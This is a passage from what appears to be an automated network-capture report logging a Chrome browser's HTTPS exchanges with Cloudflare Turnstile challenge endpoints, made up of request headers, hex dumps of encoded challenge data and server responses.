                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/k0ed6/0x4AAAAAABBagSav2GMcq5ob/auto/fbE/new/normal/auto/
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:58 UTC143INHTTP/1.1 401 Unauthorized
                                                                      Date: Wed, 19 Mar 2025 10:29:58 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 1
                                                                      Connection: close
                                                                      2025-03-19 10:29:58 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 45 36 4b 51 54 35 7a 67 45 75 68 48 4d 75 32 52 74 6b 46 46 41 70 79 6a 41 7a 42 64 6a 6c 30 7a 38 49 79 38 6b 48 58 72 4f 45 49 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                      Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gE6KQT5zgEuhHMu2RtkFFApyjAzBdjl0z8Iy8kHXrOEIAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                      2025-03-19 10:29:58 UTC1INData Raw: 4a
                                                                      Data Ascii: J


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      21192.168.2.649732104.18.95.414431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:59 UTC1191OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/966088071:1742376849:e-pQSDz4Bmg_iVm7Jg9F7dZQ1GSaY_NvFcx7L8UKqvA/922c4a999a2565e0/bwElmkdodDWQOGj80U6g0vbisR.D21TPXcrcLoLH45I-1742380194-1.1.1.1-abhJq1qSwZwA3Vl_tW6mw1yQmgoQwbtMA82LndI9lmWZgSxh0FEP4lOMhDDG8mQT HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      Content-Length: 38072
                                                                      sec-ch-ua-platform: "Windows"
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      Content-Type: text/plain;charset=UTF-8
                                                                      cf-chl: bwElmkdodDWQOGj80U6g0vbisR.D21TPXcrcLoLH45I-1742380194-1.1.1.1-abhJq1qSwZwA3Vl_tW6mw1yQmgoQwbtMA82LndI9lmWZgSxh0FEP4lOMhDDG8mQT
                                                                      cf-chl-ra: 0
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: */*
                                                                      Origin: https://challenges.cloudflare.com
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/k0ed6/0x4AAAAAABBagSav2GMcq5ob/auto/fbE/new/normal/auto/
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:59 UTC16384OUTData Raw: 63 32 6e 79 2d 66 78 69 65 66 52 7a 6e 24 42 57 61 78 6c 37 6e 45 61 57 70 57 45 57 77 56 57 46 78 36 57 64 4f 78 75 57 54 57 74 56 57 4c 78 63 75 57 24 4d 57 66 74 76 78 6d 57 55 4f 66 44 73 6e 56 57 5a 79 7a 74 57 4b 42 51 57 4f 78 57 31 51 79 76 57 68 6b 5a 75 78 47 57 66 32 57 31 37 79 24 46 7a 42 57 75 61 58 57 4b 74 4b 4f 78 64 57 74 6e 78 39 57 64 6e 32 65 4e 42 57 45 67 6b 57 63 56 78 61 6f 79 78 51 4e 56 67 61 57 24 35 56 57 78 44 4d 78 4f 78 4b 7a 56 57 64 69 4e 74 54 78 61 75 72 57 54 46 62 24 75 2d 65 6c 59 76 73 6e 4e 63 56 76 31 36 51 75 56 78 2d 37 47 33 57 4f 6e 57 63 69 56 65 57 56 73 66 4d 74 65 4f 57 74 4f 6a 4e 6e 62 4b 2b 56 43 64 77 4d 2b 33 50 6c 6f 72 24 48 67 68 4c 65 50 75 56 76 53 6a 4e 42 6b 58 56 45 67 24 54 31 66 75 24 67 72
                                                                      Data Ascii: c2ny-fxiefRzn$BWaxl7nEaWpWEWwVWFx6WdOxuWTWtVWLxcuW$MWftvxmWUOfDsnVWZyztWKBQWOxW1QyvWhkZuxGWf2W17y$FzBWuaXWKtKOxdWtnx9Wdn2eNBWEgkWcVxaoyxQNVgaW$5VWxDMxOxKzVWdiNtTxaurWTFb$u-elYvsnNcVv16QuVx-7G3WOnWciVeWVsfMteOWtOjNnbK+VCdwM+3Plor$HghLePuVvSjNBkXVEg$T1fu$gr
                                                                      2025-03-19 10:29:59 UTC16384OUTData Raw: 74 52 57 41 30 55 52 78 76 45 53 4b 72 33 34 75 41 79 78 53 34 4d 46 41 6c 66 75 78 36 37 74 57 57 74 78 35 4f 41 4a 73 79 66 63 49 62 6b 70 4d 4e 62 32 33 49 73 4a 34 39 49 52 77 54 6b 78 74 46 6b 6b 46 62 51 4b 56 59 70 70 74 79 30 49 68 45 57 7a 42 43 52 36 53 61 64 4d 49 52 68 50 57 66 78 72 75 45 66 24 4b 56 35 4f 75 4a 4b 54 34 5a 49 41 4a 61 39 4c 41 49 38 47 62 39 4c 73 79 57 49 51 4f 78 2d 49 46 49 51 76 78 4b 49 45 53 35 53 34 35 4f 24 49 4b 53 34 4f 42 38 38 75 4a 34 42 57 67 49 4f 49 4c 53 49 54 49 4b 49 4c 62 57 57 57 37 57 66 77 57 35 57 37 67 44 6b 56 77 57 6b 79 66 32 57 43 79 6e 56 45 69 4f 75 4f 66 75 45 46 57 53 53 73 61 4e 49 37 77 6a 54 63 57 56 79 57 57 7a 72 34 2d 59 53 4f 42 4e 4e 4b 33 6b 78 35 66 54 57 4a 56 74 35 78 24 57 68 6d
                                                                      Data Ascii: tRWA0URxvESKr34uAyxS4MFAlfux67tWWtx5OAJsyfcIbkpMNb23IsJ49IRwTkxtFkkFbQKVYppty0IhEWzBCR6SadMIRhPWfxruEf$KV5OuJKT4ZIAJa9LAI8Gb9LsyWIQOx-IFIQvxKIES5S45O$IKS4OB88uJ4BWgIOILSITIKILbWWW7WfwW5W7gDkVwWkyf2WCynVEiOuOfuEFWSSsaNI7wjTcWVyWWzr4-YSOBNNK3kx5fTWJVt5x$Whm
                                                                      2025-03-19 10:29:59 UTC5304OUTData Raw: 45 2d 2d 4f 54 65 39 50 6e 39 56 66 6a 4b 73 77 70 35 49 53 72 54 56 6e 33 64 5a 77 58 6b 72 66 7a 42 47 41 58 6e 31 6e 4c 57 37 57 68 63 33 49 47 46 52 37 78 37 65 6b 6e 32 59 72 31 33 53 41 52 77 49 74 76 54 49 66 51 45 74 43 50 54 75 51 72 52 6b 45 54 4b 69 52 72 34 62 6b 57 52 4f 65 4a 4d 4f 6d 43 45 6e 77 43 43 77 50 65 75 6b 57 62 57 68 52 6b 61 59 59 76 35 66 41 69 57 49 32 34 79 66 4a 44 2d 32 43 57 57 44 78 6f 79 52 34 59 66 73 49 4e 65 6c 50 65 44 42 44 73 4e 64 31 61 38 34 61 38 59 30 62 6d 32 4f 69 30 4f 43 30 36 76 76 37 4a 56 2d 44 4b 65 6f 61 4e 59 74 65 46 72 77 55 49 4d 35 6a 50 76 39 5a 65 55 44 57 79 6e 43 45 42 5a 4d 52 79 79 4e 24 64 52 61 37 53 69 5a 69 58 56 77 4a 6e 51 7a 74 32 54 35 64 2d 32 72 58 2b 4c 6a 45 79 72 44 64 34 66 79
                                                                      Data Ascii: E--OTe9Pn9VfjKswp5ISrTVn3dZwXkrfzBGAXn1nLW7Whc3IGFR7x7ekn2Yr13SARwItvTIfQEtCPTuQrRkETKiRr4bkWROeJMOmCEnwCCwPeukWbWhRkaYYv5fAiWI24yfJD-2CWWDxoyR4YfsINelPeDBDsNd1a84a8Y0bm2Oi0OC06vv7JV-DKeoaNYteFrwUIM5jPv9ZeUDWynCEBZMRyyN$dRa7SiZiXVwJnQzt2T5d-2rX+LjEyrDd4fy
                                                                      2025-03-19 10:29:59 UTC322INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:29:59 GMT
                                                                      Content-Type: text/plain; charset=UTF-8
                                                                      Content-Length: 27980
                                                                      Connection: close
                                                                      cf-chl-gen: 0TV1yYK+yMRVifCorL1LnwM6G1BkNmVpzdADAJmQPxFG3c192tCkvJVGTT489mvO$xR/nh22oSge6W9cARjpMJw==
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4ab92e34dbf4-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-03-19 10:29:59 UTC1047INData Raw: 76 62 2b 57 78 72 6c 2f 6f 62 6d 70 71 62 65 33 71 35 71 50 69 72 50 42 77 63 7a 50 77 4b 50 51 30 38 54 45 6d 70 76 49 31 4a 50 67 33 74 79 6b 35 36 48 6a 78 63 44 73 79 4a 2f 47 79 39 2f 69 33 4d 58 48 76 62 62 7a 73 72 58 44 72 62 4b 33 76 4d 66 67 31 39 66 33 41 73 51 46 32 72 37 62 42 73 6a 4b 37 50 67 48 7a 75 48 53 36 75 50 53 7a 42 66 71 31 4e 62 57 35 51 66 39 45 52 2f 64 32 4e 73 66 38 50 51 59 35 52 67 61 35 79 67 70 48 65 33 36 4a 68 45 41 43 53 6a 76 4d 76 49 71 38 53 51 58 4f 77 34 58 49 68 77 79 41 54 41 47 4f 53 68 47 49 44 38 64 4f 30 59 68 42 77 74 52 55 78 38 67 53 78 63 58 46 55 4d 6c 52 42 63 37 4c 52 5a 67 54 46 63 67 4c 30 46 61 58 30 64 43 57 7a 78 74 51 32 59 71 4f 32 67 78 4e 44 42 45 5a 54 68 46 61 32 5a 45 62 46 70 2f 57 46 5a
                                                                      Data Ascii: vb+Wxrl/obmpqbe3q5qPirPBwczPwKPQ08TEmpvI1JPg3tyk56HjxcDsyJ/Gy9/i3MXHvbbzsrXDrbK3vMfg19f3AsQF2r7bBsjK7PgHzuHS6uPSzBfq1NbW5Qf9ER/d2Nsf8PQY5Rga5ygpHe36JhEACSjvMvIq8SQXOw4XIhwyATAGOShGID8dO0YhBwtRUx8gSxcXFUMlRBc7LRZgTFcgL0FaX0dCWzxtQ2YqO2gxNDBEZThFa2ZEbFp/WFZ
                                                                      2025-03-19 10:29:59 UTC1369INData Raw: 51 74 61 54 47 6c 4c 6d 36 79 36 32 52 72 63 37 58 78 4d 32 30 6f 2b 58 6d 77 75 53 2b 33 64 7a 4c 76 4f 62 4d 76 71 7a 72 7a 65 33 4c 37 38 76 51 31 73 6e 30 38 62 76 76 34 4c 72 63 37 65 48 35 34 4f 50 71 32 39 76 43 79 67 44 38 45 4f 50 6c 34 75 4c 4d 35 4e 66 72 38 42 7a 57 30 2f 62 35 32 74 66 2b 32 65 2f 57 2f 76 48 6d 34 68 34 68 35 75 67 70 47 51 59 67 49 43 38 49 41 77 4d 33 43 43 33 35 4f 54 6f 65 43 52 67 67 49 42 51 58 4e 44 6f 65 51 41 59 46 42 55 63 62 4e 69 38 6a 51 55 67 2f 4c 56 49 50 4b 6b 67 34 56 43 30 70 47 56 67 2f 57 46 74 63 57 56 4d 64 4d 46 6b 35 49 31 38 68 50 30 70 63 54 45 77 35 57 6b 35 6e 51 56 4a 6a 64 57 56 50 57 7a 4e 50 66 55 38 32 56 54 39 73 65 48 65 44 64 45 46 7a 64 48 78 39 57 6f 79 4e 58 58 31 6b 59 46 46 78 5a 56
                                                                      Data Ascii: QtaTGlLm6y62Rrc7XxM20o+XmwuS+3dzLvObMvqzrze3L78vQ1sn08bvv4Lrc7eH54OPq29vCygD8EOPl4uLM5Nfr8BzW0/b52tf+2e/W/vHm4h4h5ugpGQYgIC8IAwM3CC35OToeCRggIBQXNDoeQAYFBUcbNi8jQUg/LVIPKkg4VC0pGVg/WFtcWVMdMFk5I18hP0pcTEw5Wk5nQVJjdWVPWzNPfU82VT9seHeDdEFzdHx9WoyNXX1kYFFxZV
                                                                      2025-03-19 10:29:59 UTC1369INData Raw: 73 71 79 34 6d 74 4c 58 6f 37 6e 50 75 4c 66 70 31 65 4c 64 71 4e 61 2f 33 65 33 77 37 73 71 72 77 36 37 41 77 4d 33 56 79 4e 53 39 73 50 6a 53 75 4f 76 79 76 66 37 39 39 41 63 44 79 65 72 6f 34 51 50 4d 37 4f 41 41 42 2f 55 4c 30 2f 55 4e 43 78 66 31 45 52 58 61 49 50 73 55 32 75 45 5a 2b 69 4d 6b 46 68 55 67 42 65 59 4e 44 76 7a 76 49 43 41 72 44 43 6b 6a 49 41 4d 55 46 51 77 38 4b 78 6e 36 4b 2f 67 62 4f 79 34 31 4d 54 4d 31 49 43 67 63 46 77 5a 4e 54 30 70 41 49 54 39 4b 4c 55 6b 55 47 52 55 75 4b 45 34 77 58 46 46 59 48 44 55 6a 55 6c 46 65 4f 43 46 41 4e 79 51 72 62 47 74 4c 62 32 74 43 54 6d 64 70 59 6d 67 34 63 6b 68 7a 63 31 70 4b 50 47 74 55 56 49 46 74 57 59 4a 6d 66 6d 74 36 62 49 5a 66 66 32 56 65 66 32 6c 79 58 58 43 4f 54 6d 78 69 5a 57 69
                                                                      Data Ascii: sqy4mtLXo7nPuLfp1eLdqNa/3e3w7sqrw67AwM3VyNS9sPjSuOvyvf799AcDyero4QPM7OAAB/UL0/UNCxf1ERXaIPsU2uEZ+iMkFhUgBeYNDvzvICArDCkjIAMUFQw8Kxn6K/gbOy41MTM1ICgcFwZNT0pAIT9KLUkUGRUuKE4wXFFYHDUjUlFeOCFANyQrbGtLb2tCTmdpYmg4ckhzc1pKPGtUVIFtWYJmfmt6bIZff2Vef2lyXXCOTmxiZWi
                                                                      2025-03-19 10:29:59 UTC1369INData Raw: 65 4c 52 73 39 7a 6c 35 4f 66 41 79 74 36 35 79 38 6d 71 37 72 50 65 35 38 33 45 36 65 72 30 39 2b 54 57 78 77 44 4e 38 2f 62 77 76 73 44 34 78 76 37 6a 36 38 62 31 79 41 6a 66 41 4d 6e 6d 37 2f 4d 50 45 68 6b 55 35 65 4c 79 39 78 49 54 32 77 4c 73 2b 52 6b 52 34 52 37 6a 4a 52 66 6b 2b 53 45 73 43 4f 59 5a 38 4f 67 6d 38 2b 38 46 42 54 6e 33 4e 7a 59 72 4b 69 41 49 4f 42 72 35 51 53 34 55 4b 43 63 71 42 69 45 2b 46 79 38 4c 43 53 64 4f 55 43 4e 4e 51 6a 4d 33 4e 30 6b 6d 54 7a 63 6d 48 68 67 34 58 56 38 79 54 57 5a 56 48 6c 74 63 61 56 31 61 50 54 34 38 5a 69 74 63 51 30 52 53 62 55 35 68 63 6c 5a 73 4e 44 35 61 62 48 5a 55 63 59 52 36 63 48 4a 63 5a 46 70 69 51 31 31 67 57 46 39 4b 58 32 4b 4c 56 5a 47 4d 5a 57 78 69 66 49 2b 62 65 47 6c 30 6d 71 4b 58
                                                                      Data Ascii: eLRs9zl5OfAyt65y8mq7rPe583E6er09+TWxwDN8/bwvsD4xv7j68b1yAjfAMnm7/MPEhkU5eLy9xIT2wLs+RkR4R7jJRfk+SEsCOYZ8Ogm8+8FBTn3NzYrKiAIOBr5QS4UKCcqBiE+Fy8LCSdOUCNNQjM3N0kmTzcmHhg4XV8yTWZVHltcaV1aPT48ZitcQ0RSbU5hclZsND5abHZUcYR6cHJcZFpiQ11gWF9KX2KLVZGMZWxifI+beGl0mqKX
                                                                      2025-03-19 10:29:59 UTC1369INData Raw: 6d 2b 78 72 58 4a 79 4f 50 63 72 61 2b 7a 30 4e 58 42 36 63 32 30 38 39 4c 54 33 41 44 6f 79 65 4b 35 76 65 44 31 32 66 62 32 77 2b 6f 4b 35 4e 34 50 78 77 2f 39 42 78 4c 73 38 74 38 55 38 65 76 79 2b 65 62 2b 46 78 30 6a 44 53 41 50 41 4e 34 6d 49 78 49 71 36 50 55 69 2b 69 58 2b 44 79 49 71 4e 41 77 74 38 2f 55 78 4f 53 34 54 46 41 38 34 45 43 34 35 4c 79 45 63 4c 7a 34 39 46 6a 63 30 53 30 45 48 4f 79 41 70 52 45 49 30 51 6c 46 47 4f 6b 30 33 4b 68 63 39 4b 30 6c 5a 55 45 4e 62 56 6a 35 44 52 55 56 6a 56 79 4e 4a 59 32 52 6c 53 45 46 4e 50 45 70 47 53 6b 34 77 53 32 4e 77 55 33 64 37 65 30 42 5a 54 34 4e 69 5a 6a 32 49 65 44 77 39 65 34 42 71 57 34 74 6d 52 49 78 53 5a 70 61 53 6a 31 52 6e 55 58 4f 4f 66 57 79 49 6a 32 39 34 67 56 31 31 71 47 42 70 70
                                                                      Data Ascii: m+xrXJyOPcra+z0NXB6c2089LT3ADoyeK5veD12fb2w+oK5N4Pxw/9BxLs8t8U8evy+eb+Fx0jDSAPAN4mIxIq6PUi+iX+DyIqNAwt8/UxOS4TFA84EC45LyEcLz49Fjc0S0EHOyApREI0QlFGOk03Khc9K0lZUENbVj5DRUVjVyNJY2RlSEFNPEpGSk4wS2NwU3d7e0BZT4NiZj2IeDw9e4BqW4tmRIxSZpaSj1RnUXOOfWyIj294gV11qGBpp
                                                                      2025-03-19 10:29:59 UTC1369INData Raw: 6b 79 50 48 79 77 71 33 6c 30 2b 6e 54 33 4e 66 58 7a 39 50 65 77 50 58 56 35 66 7a 43 36 4d 45 41 78 72 30 43 41 2b 2f 37 37 75 33 71 43 2b 4c 73 34 4f 41 4b 36 77 50 35 32 66 4c 74 47 4f 44 39 32 52 41 6c 49 78 7a 38 33 68 63 6b 36 51 6e 6f 39 75 48 35 4b 77 30 45 42 79 49 49 36 66 45 45 4b 42 77 4b 45 2f 51 51 46 67 44 34 45 52 4d 65 52 45 59 44 47 79 55 6f 49 78 63 6e 4c 52 38 70 4b 78 51 78 45 55 59 31 4d 79 4d 6c 52 79 70 61 47 32 41 70 54 54 4d 68 4a 47 56 51 4d 6b 68 6a 58 56 74 70 61 56 30 39 4b 30 70 4c 58 6b 6f 30 61 54 5a 77 4e 58 45 35 61 32 6b 37 57 58 73 36 62 59 56 38 63 33 36 43 64 45 4e 48 59 6c 31 4d 68 31 42 44 63 46 36 4f 66 6f 74 70 68 4a 65 55 68 56 5a 70 57 35 56 64 67 70 64 33 6e 33 39 69 63 48 6d 52 5a 6f 69 43 68 57 6c 6c 6a 4b
                                                                      Data Ascii: kyPHywq3l0+nT3NfXz9PewPXV5fzC6MEAxr0CA+/77u3qC+Ls4OAK6wP52fLtGOD92RAlIxz83hck6Qno9uH5Kw0EByII6fEEKBwKE/QQFgD4ERMeREYDGyUoIxcnLR8pKxQxEUY1MyMlRypaG2ApTTMhJGVQMkhjXVtpaV09K0pLXko0aTZwNXE5a2k7WXs6bYV8c36CdENHYl1Mh1BDcF6OfotphJeUhVZpW5Vdgpd3n39icHmRZoiChWlljK
                                                                      2025-03-19 10:29:59 UTC1369INData Raw: 2b 50 6e 69 72 63 6e 34 76 65 63 43 2b 38 48 52 31 50 44 42 37 39 66 35 32 41 7a 4a 2f 4e 33 42 45 66 7a 69 2f 67 38 43 39 76 67 61 41 2f 67 63 48 51 7a 77 33 41 6f 63 33 66 48 77 45 75 45 59 35 52 37 39 33 52 77 75 37 53 30 45 4d 51 63 70 42 44 59 4c 49 51 73 34 4d 2f 6b 51 50 44 6b 58 44 45 45 39 4c 52 4a 46 51 54 45 63 51 30 56 42 48 30 31 4a 4a 79 4a 53 4a 30 6b 6a 56 55 46 55 56 56 70 46 4d 79 31 65 48 6c 6b 7a 59 43 4a 52 4d 6d 5a 50 4a 6a 52 70 50 32 6b 34 62 47 6c 50 52 48 46 48 61 48 46 32 4e 6d 56 4c 65 48 56 54 53 6e 35 35 56 30 79 43 61 30 4a 56 68 59 46 31 57 6f 6c 66 67 56 79 4e 65 58 6c 62 69 34 32 46 58 35 57 42 6b 57 61 5a 62 35 46 74 6e 6e 4f 63 6e 61 4b 4e 66 33 57 6c 6f 5a 31 7a 71 6d 71 6c 64 36 36 6e 62 6f 4b 79 63 71 32 45 74 48 61
                                                                      Data Ascii: +Pnircn4vecC+8HR1PDB79f52AzJ/N3BEfzi/g8C9vgaA/gcHQzw3Aoc3fHwEuEY5R793Rwu7S0EMQcpBDYLIQs4M/kQPDkXDEE9LRJFQTEcQ0VBH01JJyJSJ0kjVUFUVVpFMy1eHlkzYCJRMmZPJjRpP2k4bGlPRHFHaHF2NmVLeHVTSn55V0yCa0JVhYF1WolfgVyNeXlbi42FX5WBkWaZb5FtnnOcnaKNf3WloZ1zqmqld66nboKycq2EtHa


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      22192.168.2.649733104.18.94.414431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:30:00 UTC638OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/966088071:1742376849:e-pQSDz4Bmg_iVm7Jg9F7dZQ1GSaY_NvFcx7L8UKqvA/922c4a999a2565e0/bwElmkdodDWQOGj80U6g0vbisR.D21TPXcrcLoLH45I-1742380194-1.1.1.1-abhJq1qSwZwA3Vl_tW6mw1yQmgoQwbtMA82LndI9lmWZgSxh0FEP4lOMhDDG8mQT HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:30:00 UTC442INHTTP/1.1 400 Bad Request
                                                                      Date: Wed, 19 Mar 2025 10:30:00 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 14
                                                                      Connection: close
                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                      cf-chl-out: 8o9YypzSypFt52qGjW0ex8+GOMTZiXrb+iBjp057Im+qDxLNAvJrbR2j7dmteyDIqKyKjahZqEfU5hgzEVxVFw==$yv2lftwon6gTTuNaNzn3iA==
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4abaec412ba9-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-03-19 10:30:00 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 38 30 7d
                                                                      Data Ascii: {"err":100280}


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      23192.168.2.649736104.18.95.414431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:30:03 UTC1191OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/966088071:1742376849:e-pQSDz4Bmg_iVm7Jg9F7dZQ1GSaY_NvFcx7L8UKqvA/922c4a999a2565e0/bwElmkdodDWQOGj80U6g0vbisR.D21TPXcrcLoLH45I-1742380194-1.1.1.1-abhJq1qSwZwA3Vl_tW6mw1yQmgoQwbtMA82LndI9lmWZgSxh0FEP4lOMhDDG8mQT HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      Content-Length: 40505
                                                                      sec-ch-ua-platform: "Windows"
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      Content-Type: text/plain;charset=UTF-8
                                                                      cf-chl: bwElmkdodDWQOGj80U6g0vbisR.D21TPXcrcLoLH45I-1742380194-1.1.1.1-abhJq1qSwZwA3Vl_tW6mw1yQmgoQwbtMA82LndI9lmWZgSxh0FEP4lOMhDDG8mQT
                                                                      cf-chl-ra: 0
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: */*
                                                                      Origin: https://challenges.cloudflare.com
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/k0ed6/0x4AAAAAABBagSav2GMcq5ob/auto/fbE/new/normal/auto/
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:30:03 UTC16384OUTData Raw: 63 32 6e 79 2d 66 78 69 65 66 52 7a 6e 24 42 57 61 78 6c 37 6e 45 61 57 70 57 45 57 77 56 57 46 78 36 57 64 4f 78 75 57 54 57 74 56 57 4c 78 63 75 57 24 4d 57 66 74 76 78 6d 57 55 4f 66 44 73 6e 56 57 5a 79 7a 74 57 4b 42 51 57 4f 78 57 31 51 79 76 57 68 6b 5a 75 78 47 57 66 32 57 31 37 79 24 46 7a 42 57 75 61 58 57 4b 74 4b 4f 78 64 57 74 6e 78 39 57 64 6e 32 65 4e 42 57 45 67 6b 57 63 56 78 61 6f 79 78 51 4e 56 67 61 57 24 35 56 57 78 44 4d 78 4f 78 4b 7a 56 57 64 69 4e 74 54 78 61 75 72 57 54 46 62 24 75 2d 65 6c 59 76 73 6e 4e 63 56 76 31 36 51 75 56 78 2d 37 47 33 57 4f 6e 57 63 69 56 65 57 56 73 66 4d 74 65 4f 57 74 4f 6a 4e 6e 62 4b 2b 56 43 64 77 4d 2b 33 50 6c 6f 72 24 48 67 68 4c 65 50 75 56 76 53 6a 4e 42 6b 58 56 45 67 24 54 31 66 75 24 67 72
                                                                      Data Ascii: c2ny-fxiefRzn$BWaxl7nEaWpWEWwVWFx6WdOxuWTWtVWLxcuW$MWftvxmWUOfDsnVWZyztWKBQWOxW1QyvWhkZuxGWf2W17y$FzBWuaXWKtKOxdWtnx9Wdn2eNBWEgkWcVxaoyxQNVgaW$5VWxDMxOxKzVWdiNtTxaurWTFb$u-elYvsnNcVv16QuVx-7G3WOnWciVeWVsfMteOWtOjNnbK+VCdwM+3Plor$HghLePuVvSjNBkXVEg$T1fu$gr
                                                                      2025-03-19 10:30:03 UTC16384OUTData Raw: 74 52 57 41 30 55 52 78 76 45 53 4b 72 33 34 75 41 79 78 53 34 4d 46 41 6c 66 75 78 36 37 74 57 57 74 78 35 4f 41 4a 73 79 66 63 49 62 6b 70 4d 4e 62 32 33 49 73 4a 34 39 49 52 77 54 6b 78 74 46 6b 6b 46 62 51 4b 56 59 70 70 74 79 30 49 68 45 57 7a 42 43 52 36 53 61 64 4d 49 52 68 50 57 66 78 72 75 45 66 24 4b 56 35 4f 75 4a 4b 54 34 5a 49 41 4a 61 39 4c 41 49 38 47 62 39 4c 73 79 57 49 51 4f 78 2d 49 46 49 51 76 78 4b 49 45 53 35 53 34 35 4f 24 49 4b 53 34 4f 42 38 38 75 4a 34 42 57 67 49 4f 49 4c 53 49 54 49 4b 49 4c 62 57 57 57 37 57 66 77 57 35 57 37 67 44 6b 56 77 57 6b 79 66 32 57 43 79 6e 56 45 69 4f 75 4f 66 75 45 46 57 53 53 73 61 4e 49 37 77 6a 54 63 57 56 79 57 57 7a 72 34 2d 59 53 4f 42 4e 4e 4b 33 6b 78 35 66 54 57 4a 56 74 35 78 24 57 68 6d
